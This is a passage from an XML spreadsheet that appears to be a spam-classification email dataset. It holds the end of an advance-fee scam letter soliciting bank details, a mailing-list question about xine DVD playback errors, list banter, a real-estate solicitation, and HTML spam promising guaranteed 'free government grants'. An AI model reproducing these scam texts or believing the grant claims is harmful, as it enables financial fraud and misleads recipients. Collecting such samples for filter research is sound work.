 harassments, by security operatives/agents of the new Head of State
 (General Obasanjo) who served a jail term under my friend's father for
 coup offence. Even my friend's old mother has been detained and tortured
 many times.  Mohammed is now being charged for military decision of his
 father's regime e.g. the murder cases of political opponents. These
 offences he knows nothing about, as he was only the Head of State's son,
 not even a military man nor was he in the government. 
 His father ruled for five years during which period he acquired financial
 gains and property all over the world from his share of Crude Oil Sales as
 the Head of State. Now, the family has lost all assets (property and money
 in Nigeria) to the new government. Ref. News Watch Magazine publication of
 11th to 18th October, 1999. However, they have hidden records in a secret
 name with the Nigerian Insurance Deposit Corporation to access a coded
 trust accounts in Europe valued at Three Hundred and Thirty Eight Million
 United States Dollars only ($338,000,000).   Mohammed is currently being
 detained and tortured to sign off accounts of his late father and he has
 done that but not the coded trust accounts in the name of certain
 government multinational contractors that I can not disclose now.
 THE AIM OF THIS LETTER IS TO REQUEST YOUR ASSISTANCE TO SECURE THIS
 ACCOUNT IN A SAFE/CONFIDENTIAL BANK AND HELP INVEST THE MONEY FOR OUR
 MUTUAL BENEFIT. We also expect to use some of our share of the money to
 relocate ourselves to another safe Country because right now Nigeria is
 not safe and we will like to go into hiding overseas if we can escape.
 If you are interested in helping secure the accounts please contact me
 immediately by email "a_sanni@email.com", so that we can arrange an
 initial meeting in a neighboring country, thus you can present your
 investment program and projects for our assessment.  Thereafter we will
 sign an MOU (Memorandum of Understanding) binding this business
 relationship and immediately entrust you to access the coded trust
 accounts in Europe valued at Three Hundred and Thirty Eight Million United
 States Dollars only ($338,000,000).
 We will depend on your business experience to make sure that we get
 maximum returns on our investment with you.
 PLEASE NOTE THAT IN THE PROCESS OF SECURING THE CODED TRUST ACCOUNT YOU
 ARE LIKELY TO INCURE EXPENSES BUT IT WILL BE PAID BACK ONCE WE SECURE THE
 DEPOSIT.  IT IS 100% SAFE FOR YOU AND YOU HAVE NOTHING TO WORRY ABOUT. 
 Just forward via email your full name, phone number, fax number and bank
 details as the new beneficiary to enable us make formal application for
 the transfer of ownership to you.
 We look forward to your helping us, but if you are not interested kindly
 discard this letter and still maintain its confidentiality.
 Ma-Salam.
 For Mohammed Abacha
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: xine cannot play DVDs - "liba52: a52_block error"
</t>
  </si>
  <si>
    <t xml:space="preserve">Since libdvdcss-1.2.0, I have been unable to play DVDs using ogle, xine,
 vlc, or mplayer.  They all show a scrambled picture with (VERY) choppy
 audio.  When I run xine I see tons of these in the console: 
 liba52: a52_block error
 liba52: a52_block error
 liba52: a52_block error
 liba52: a52_block error
 audio_out: inserting 5859 0-frames to fill a gap of 10989 pts
 metronom: audio jump
 liba52: a52_block error
 Has anyone seen this before and know how to fix it?  Or should I file a
 bug report?  
 Thanks for your help.  
 - Jon
 -- 
 jon@tgpsolutions.com
 Administrator, tgpsolutions
 http://www.tgpsolutions.com
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Righ, somebody. Reminds me of the old Divorced Man's exposition of what
 happened to him.
 "First, you get a ring. Then you give it away. Then, you get a house. And
 you give *that* away...."
 Just kidding, Darling...
 ;-).
 Cheers,
 RAH
 Who, um, doesn't own a house...
 --- begin forwarded text
 Status: RO
 Date: Tue, 24 Sep 2002 20:12:12 -0400
 From: Somebody
 To: "R. A. Hettinga" &lt;rah@shipwright.com&gt;
 Subject: Re: SF Weekly's Ultimate SF Date lineup :-)
 Bob,
     Living aboard a Cessna 172 would be challenging, but I did meet a
 couple at an airshow in Point Mugu in 1995 or so that had converted an
 old seaplane (it was a bit larger than a PBY, I think) to something of a
 floating, flying RV.  They visited a lot of airshows and covered a lot of
 miles.  I'm sure maintenance (on a 50+ year old airframe), fuel (for two
 large radial engines) insurance and other costs were out of my price
 range, but what a hoot!
     On a more realistic note, the flight to Half Moon bay was probably 2
 hours of flight time at about  $75/hour in the Cessna.  Not exactly a
 cheap date, but that's nothing compared to the money I've spent on her
 since.  (And loved every minute of it, Darling!!)
         &lt;Somebody&gt;
 "R. A. Hettinga" wrote:
 &gt; --- begin forwarded text
 &gt;
 &gt; Status: RO
 &gt; Delivered-To: fork@example.com
 &gt; To: fork@example.com
 &gt; Subject: Re: SF Weekly's Ultimate SF Date lineup :-)
 &gt; From: Dave Long &lt;dl@silcom.com&gt;
 &gt; Sender: fork-admin@xent.com
 &gt; Date: Tue, 24 Sep 2002 13:28:04 -0700
 &gt;
 &gt; &gt; Proving, once again, that aviators get all the chicks...
 &gt;
 &gt; Just as long as they have the wherewithal
 &gt; for avgas, anyway.
 &gt;
 &gt; I think Turpin once calculated that one
 &gt; could do a decent amount of messing about
 &gt; for about $30K of boat and $12K/year in
 &gt; living expenses.
 &gt;
 &gt; What are the equivalent figures for live
 &gt; aboard aircraft?
 &gt;
 &gt; -Dave
 &gt;
 &gt; (How difficult would it be to find the
 &gt; harbormaster, after mooring to the top
 &gt; of the Empire State Building?)
 &gt;
 &gt; --- end forwarded text
 &gt;
 &gt; --
 &gt; -----------------
 &gt; R. A. Hettinga &lt;mailto: rah@ibuc.com&gt;
 &gt; The Internet Bearer Underwriting Corporation &lt;http://www.ibuc.com/&gt;
 &gt; 44 Farquhar Street, Boston, MA 02131 USA
 &gt; "... however it may deserve respect for its usefulness and antiquity,
 &gt; [predicting the end of the world] has not been found agreeable to
 &gt; experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'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</si>
  <si>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And the ever popular...
 Or bring a baby,
 Provided you do not own,
 Women come, at baby's cry.
 GS&gt; less obscure haiku 
 GS&gt; buy a puppy, ro!
 GS&gt; they are chick magnets. master
 GS&gt; ventriloquism.
 GS&gt; gg
 GS&gt; -----Original Message-----
 GS&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Tom
 GS&gt; Sent: Wednesday, September 18, 2002 7:13 PM
 GS&gt; To: R. A. Hettinga
 GS&gt; Cc: fork@example.com
 GS&gt; Subject: Re: AA Meetings the Hottest Place to Meet Women With Big Bucks
 GS&gt; On Wed, 18 Sep 2002, R. A. Hettinga wrote:
 GS&gt; --]AA Meetings the Hottest Place to Meet Women With Big Bucks
 GS&gt; And, as always, you can take a page out of Fight Club and start showing up
 GS&gt; at all sorts of support groups. Look what it did for Marla and Jack...
 GS&gt; "JACK You can't have *both* parasites. You take blood parasites and --
 GS&gt; MARLA I want brain parasites.
 GS&gt; She opens another dryer and does the same thing again. PG 19
 GS&gt; JACK Okay. I'll take blood parasites and I'll take organic brain dementia
 GS&gt; and --
 GS&gt; MARLA I want that.
 GS&gt; JACK You can't have the whole brain!
 GS&gt; MARLA So far, you have four and I have two!
 GS&gt; JACK Well, then, take blood  parasites. Now, we each have three.
 GS&gt; MARLA So, we each have three -- that's six. What  about the seventh day? I
 GS&gt; want ascending bowel cancer.
 GS&gt; JACK *I* want ascending bowel cancer.
 GS&gt; MARLA That's your favorite, too? Tried to slip it by me, huh?
 GS&gt; JACK We'll split it. You get it the first and third Sunday of the month.
 GS&gt; MARLA Deal."
 -- 
 Best regards,
  bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Still looking for a house?
</t>
  </si>
  <si>
    <t xml:space="preserve">My name is Jeremy Lessaris. I'm looking for investment properties in the Midwest. The issue I've been having is that not every everyone deals with the properties I'm looking for. You know the houses that you are almost sure will not sell; maybe they're really ugly or need a lot of work or are in a bad neighborhood. But for what ever reason, the houses just don't sell.
 I need those houses...
 Most of the agents I've dealt with were hesitant because there isn't much of a return for what time and effort you invest. However, the private investors I work with use "unconventional" private funding so we both can avoid long drawn out loan approvals. In fact most cases we just pay cash and close in a week. I am pre-qualified with Greentree Funding for up to $900,000 for a purchase money mortgage based on a non-owner occupied loan at 90% LTV.  (And of course you get your full commission.) 
 I'm not a licensed real estate agent nor am I affiliated with any real estate firm, which means I can work with you just about any way you want. Please don't be under the impression that we have to pay under market value to be interested. Sometimes I can even pay retail price. The only guarantee I'll make is that I will not waste your time, and in most cases I can tell you over the phone whether I'm interested or not. 
 If you are looking to purchace a project home from our inventory or would like information on forming an alliance with  Synteligent Properties, please contact me @ 847.366.4300 or email me @ jeremy@synteligent.com 
 Best Wishes, 
 Jeremy Lessaris
 847.366.4300
 www.synteligent.com
 jeremy@synteligent.com
 To Unsubscribe: send mail to majordomo@FreeBSD.org
 with "unsubscribe freebsd-ports" in the body of the message
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;center&gt;
 &lt;h1&gt;
 &lt;b&gt;&lt;font face="Arial Black"&gt;&lt;font color="#0000FF"&gt;&lt;font size=+2&gt;&amp;nbsp;
 Free Personal and Business Grants&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h1&gt;&lt;/center&gt;
 &lt;p&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER=0 CELLSPACING=0 CELLPADDING=10 WIDTH="419" BGCOLOR="#0000FF" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="397" BGCOLOR="#FFFF00"&gt;
 &lt;center&gt;
 &lt;h2&gt;
 &lt;font face="Arial Narrow"&gt;" Qualify for &lt;u&gt;at least&lt;/u&gt; $25,000 in free
 grants money - Guaranteed! "&lt;/font&gt;&lt;/h2&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;center&gt;
 &lt;h3&gt;
 &lt;font face="Arial"&gt;&lt;font size=+0&gt;Each day over One Million Dollars in Free
 Government&lt;br&gt;
 Grants&amp;nbsp; is given away to people just like you for a wide&lt;br&gt;
 variety of Business And Personal Needs&lt;/font&gt;&lt;/font&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Dear Grant Seeker,&lt;/font&gt;&lt;/font&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;In a moment, I'll tell you
 exactly &lt;b&gt;HOW &amp;amp; WHERE&lt;/b&gt; to get Grants. This &lt;b&gt;MONEY&lt;/b&gt; has to
 be given away, &lt;b&gt;WHY&lt;/b&gt; not to &lt;b&gt;YOU?&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You may be thinking, "How
 can I get some of this Free Grants Money"&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Maybe you think it's impossible
 to get free money?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Let me tell you it's not
 impossible! It's a fact, ordinary people and businesses all across the
 United States are receiving millions of dollars from these Government and
 Private Foundation's everyday.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Who Can Apply?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;ANYONE&lt;/b&gt; can apply
 for a Grant from 18 years old and up!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Grants from $500.00 to $50,000.00
 are possible! &lt;b&gt;GRANTS&lt;/b&gt; don't have to be paid back,
 &lt;b&gt;EVER! &lt;/b&gt;Claim
 your slice of the &lt;b&gt;FREE&lt;/b&gt; American Pie.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This money is not a loan,
 Trying to get money through a conventional bank can be very time consuming
 and requires a lot of paperwork, only to find out that you've been denied.
 These Government Agencies don't have to operate under the same stringent
 requirements that banks do.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You decide how much money
 you need, as long as it's a lawful amount and meets with the Government
 Agencies criteria, the money is yours to keep and never has to be repaid.
 This money is non taxable &amp;amp; interest free.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;None of these programs require
 a credit check, collateral, security deposits or co-signers, you can apply
 even if you have a bankruptcy or bad credit, it doesn't matter, you as
 a tax payer and U.S. citizen are entitled to this money.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;There are currently over
 1,400 Federal Programs, 24,000 State Programs, 30,000 Private Foundations
 and 20,000 Scholarship Programs available.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This year over $30 Billion
 Dollars In Free personal and business Government Grants Money will be given
 away by Government Grants Agencies.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER CELLSPACING=0 CELLPADDING=3 WIDTH="80%" BORDERCOLOR="#ffcc66" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="100%"&gt;
 &lt;center&gt;
 &lt;h3&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;&lt;font size=+0&gt;Government Personal
 and Business Grants Facts:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Over 20 Million People Get Government
 Money Every Year:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;ul&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;1,000,000 entrepreneurs get money
 to start or expand a business&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;4,000,000 people get money to invest
 in real estate&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;6,000,000 people get money to go
 to college&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;10,000,000 people get free help and
 training for a better job&lt;/font&gt;&lt;/font&gt;&lt;/ul&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;h2&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Getting Business
 Grants&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Anyone thinking about going
 into business for themselves, or wanting to expand an existing business
 should rush for the world's largest "one-stop-money-shop" where FREE business
 grants to start or expand a business is being held for you by the Federal
 Government.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;It
 sounds absolutely incredible that people living right here in the United
 States of America wouldn't know that each year the world's largest source
 of free business help delivers:&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;ul&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Over $30 billion dollars in free
 business grants and low-interest loans;&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;over one-half trillion dollars in
 procurement contracts; and&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;over $32 billion dollars in FREE
 consulting and research grants.&lt;/font&gt;&lt;/font&gt;&lt;/ul&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;With an economy that remains
 unpredictable, and a need for even greater economic development on all
 fronts, the federal government is more willing than it ever has been before
 to give you the money you need to own your own business and become your
 own boss!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;In
 spite of the perception that people should not look to the government for
 help, the great government give-away programs have remained so incredibly
 huge that if each of the approximately 8 million businesses applied for
 an equal share, they would each receive over $70,000.&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Most
 people never apply for FREE Business Grants because they somehow feel it
 isn't for them, feel there's too much red-tape, or simply don't know who
 to contact.The fact is, however, that people from all walks of life do
 receive FREE GRANTS MONEY and other benefits from the government, and you
 should also.&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;h2&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Government Grants
 for Personal Need&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Help to buy a new home for
 low income families, repair your home, rent, mortgage payments, utility
 bills, purchase a new car, groceries, childcare, fuel, general living expenses,
 academic tutoring, clothing, school supplies, housing assistance, legal
 services, summer camp, debts, music lessons, art lessons, any extracurricular
 activities, pay bills for senior citizens, real estate taxes, medical expenses
 and general welfare. If you or someone you know suffered a fire lose there
 are programs available to help in replacing necessities.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;h2&gt;
 &lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Scholarships And
 Grants For Education&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Grant Money for preschool
 children and nursery school education, private, primary and secondary schools,
 men and women to further their education, scholarships for athlete's, business
 management, engineering, computer science, medical school, undergraduate,
 graduate, professional, foreign studies and many more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;h3&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Here's How You
 Can Get Free Grants&lt;br&gt;
 In The Shortest Time Possible&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Once you know how and where
 to apply for a specific Free Grant, results are almost inevitable. The
 government wants to give away this money. . . it is under congressional
 mandate to do so! These funds are made available to help you, the tax payer.
 All that's required from you is the proper presentation of your grant request.
 That's all.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;Announcing...&lt;/font&gt;&lt;/font&gt;
 &lt;center&gt;
 &lt;h3 STYLE="margin-left: 1cm; margin-right: 1cm; margin-top: 0cm"&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#CC0000"&gt;&lt;font size=-1&gt;"The Complete
 Guide To Government Grants"&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Forget just about everything
 you've seen or heard about government grants. What I've done is put together
 a complete blueprint for researching, locating and obtaining government
 grants. "The Complete Guide To Government Grants" is the most comprehensive
 tool for obtaining free grant money, and it comes in an Electronic book&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;(e-book) format, meaning you can
 download and start using it minutes after you order.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;The
 Complete Guide to Government Grants will provide you with access to thousands
 of grant and loan sources, with step by step instructions to proposal writing
 and contact procedures.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;In the Complete Guide to Government
 Grants you'll find:&lt;/font&gt;&lt;/font&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Step by step guidelines
 to applying for government grants&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to over 1,400
 grant, loan and assistance programs offered by the U.S. federal government.
 All you need to do is Click &amp;amp; Find your program from the detailed categorized
 listings&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to thousands
 of resources of state specific grant programs&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Name, phone number and address
 of an expert in your state that will answer your grant related questions
 and help you with the grant application... free of charge&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Online directory of government
 supported venture capital firms&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A unique search tool that
 will allow you to generate a customized listing of recently announced grant
 programs&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Government funding programs
 for small businesses&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Top 100 government programs
 (based on number of inquiries), discover what are the most sought after
 government grants and assistant programs. Claim your slice of the &lt;b&gt;FREE&lt;/b&gt;
 American Pie&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Online Directory of federal
 and state resources for government scholarships and grants for education&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Step by step guidelines
 to locating grants, loans and assistant programs for starting a new business
 or expanding an existing one&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to get free small business
 counseling and expert advice courtesy of the US government&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Government grants application
 forms&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to thousands
 of government grants programs covering: small businesses, home improvement,
 home buying and homeownership, land acquisition, site preparation for housing,
 health, assistance and services for the unemployed, job training, federal
 employment, education, and much much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to develop and write
 grant proposals that get results&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;...Plus much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Complete Guide to Government
 Grants is so comprehensive, it provides you with direct access to practically
 every source of FREE government grants money currently available.&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;If you're an American citizen
 or resident, you are entitled to free grant money ranging from $500 to
 $250,000 or more. If you are Black you have already qualified for 15 programs,
 being Hispanic, you qualify for many programs. Being a Christian will get
 you into 20 programs, there are also many other programs available for
 different faiths, Jewish, Catholic. Not having any money, will get you
 into over 30 programs, 550 programs if you are unemployed, or underemployed.
 The list and sources are endless.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You Are Eligible! This money
 is Absolutely Free and will be yours to use for any worthwhile purpose.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Did you know you can apply
 for as many grants as you want?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;It's true, For instance,
 you could get a $65,000 grant to begin a weight loss business, get $8,800
 in tuition to become a nurse or $35,000 to open up the day-care center,
 you've always dreamed of owning. And then, go out and apply for a grant
 to buy a home for you and your family. And once your new business starts
 doing well you could go out and get another grant for expansion of your
 business. The possibilities are endless.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER=0 CELLSPACING=0 CELLPADDING=2 WIDTH="555" &gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;h3&gt;
 &lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;You Must Qualify
 For &lt;u&gt;At Least&lt;/u&gt; $25,000 In Free&lt;br&gt;
 Grants Money, Or Your Money Back!&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/h3&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;We are so confident in our
 Grants Guide that If you have not received at least $25,000 in free grant
 money, or, if you are unhappy with our e-book for any reason within the
 next 12 months, Just send the e-book back and we will refund your entire
 payment. NO QUESTIONS ASKED!!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;If you want to order, we
 insist you do so entirely at our risk. That is why the E-book comes with
 a... &lt;b&gt;No Risk full year Money-Back Guarantee&lt;/b&gt;. There is absolutely
 NO RISK on your part with this 365 day guarantee. What we mean is we want
 you to order without feeling you might "get taken."&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Therefore, we want you to
 order this material today... read it, use it... and if for any reason you
 aren't completely satisfied, you not only can cancel, &lt;b&gt;you should&lt;/b&gt;,
 for an immediate refund of your purchase price. You simply can't lose.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote STYLE="text-align: center"&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#0000CC"&gt;&lt;font size=+1&gt;Free
 Bonuses&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Just to "sweeten" the deal,
 I'll include the following &lt;b&gt;four valuable bonuses&lt;/b&gt;, that you can keep
 as a gift, even if you later decide not to keep the Grants Guide!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #1:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A Fully Featured Grants
 Writing Tutorial Software Package&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;THIS INFO ALONE IS WORTH
 THOUSANDS OF DOLLARS - I GUARANTEE YOU CAN PURCHASE A GRANTS CD OR INFO
 ANYWHERE, AND YOU WILL NOT RECEIVE THIS DOWNLOADABLE SOFTWARE THAT ACTUALLY
 SHOWS YOU HOW TO APPLY AND WHAT TO SAY, SO THAT YOU ARE ACCEPTED FOR A
 GRANT !!!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This interactive software
 tool will walk you through the grant-writing process and will teach you
 everything you need to know to write competitive grants proposals.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The program includes:&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;ul&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;detailed information and
 tips on writing grants proposals;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;how to complete a grant
 application package;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;examples of good, complete
 grant packages;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
